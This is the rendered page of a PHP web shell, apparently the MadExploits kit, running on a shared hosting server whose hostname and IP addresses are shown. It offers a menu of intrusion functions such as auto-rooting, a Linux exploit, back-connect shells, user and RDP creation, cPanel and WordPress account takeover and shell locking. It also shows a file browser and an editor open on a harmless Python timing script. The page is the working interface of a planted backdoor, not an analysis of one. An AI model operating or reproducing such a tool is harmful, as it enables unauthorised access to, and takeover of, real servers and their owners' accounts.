Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.116.152 | : 216.73.216.7
Cant Read [ /etc/named.conf ]
8.1.32
bankpromax
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib64 /
python2.7 /
Demo /
rpc /
[ HOME SHELL ]
Name
Size
Permission
Action
MANIFEST
361
B
-rw-r--r--
README
1.23
KB
-rw-r--r--
T.py
575
B
-rw-r--r--
T.pyc
952
B
-rw-r--r--
T.pyo
952
B
-rw-r--r--
mountclient.py
6.48
KB
-rw-r--r--
mountclient.pyc
5.58
KB
-rw-r--r--
mountclient.pyo
5.58
KB
-rw-r--r--
nfsclient.py
5.2
KB
-rw-r--r--
nfsclient.pyc
6.74
KB
-rw-r--r--
nfsclient.pyo
6.74
KB
-rw-r--r--
rnusersclient.py
2.57
KB
-rw-r--r--
rnusersclient.pyc
5.01
KB
-rw-r--r--
rnusersclient.pyo
5.01
KB
-rw-r--r--
rpc.py
26.98
KB
-rw-r--r--
rpc.pyc
29.72
KB
-rw-r--r--
rpc.pyo
29.72
KB
-rw-r--r--
test
697
B
-rw-r--r--
xdr.py
4.93
KB
-rw-r--r--
xdr.pyc
7.72
KB
-rw-r--r--
xdr.pyo
7.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : T.py
# Simple interface to report execution times of program fragments. # Call TSTART() to reset the timer, TSTOP(...) to report times. import sys, os, time def TSTART(): global t0, t1 u, s, cu, cs = os.times() t0 = u+cu, s+cs, time.time() def TSTOP(*label): global t0, t1 u, s, cu, cs = os.times() t1 = u+cu, s+cs, time.time() tt = [] for i in range(3): tt.append(t1[i] - t0[i]) [u, s, r] = tt msg = '' for x in label: msg = msg + (x + ' ') msg = msg + '%r user, %r sys, %r real\n' % (u, s, r) sys.stderr.write(msg)
Close